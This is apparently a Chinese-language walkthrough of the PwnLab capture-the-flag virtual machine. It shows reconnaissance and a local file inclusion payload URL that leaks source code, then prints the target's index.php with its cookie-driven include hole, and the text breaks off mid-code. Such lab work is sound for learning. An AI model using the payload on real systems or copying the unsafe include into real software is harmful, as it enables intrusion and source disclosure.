pwnlab通关
主要利用文件包含,环境变量劫持漏洞通关的一个靶场
信息收集
靶机ip:192.168.112.133
开放端口
根据开放的端口信息决定从80web端口入手
目录信息
在images和upload路径存在目录遍历,config.php被渲染无法查看,upload.php需要先登录才能访问,尝试先从登录login.php界面入手
渗透阶段
访问
http://192.168.112.133
点击login,路径变为
http://192.168.112.133/?page=login
再访问下login.php
http://192.168.112.133/login.php
很明显的文件包含,利用php文件流进行读取,再进行base64解码
index.php
http://192.168.112.133/?page=convert.base64-encode/resource=index
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include(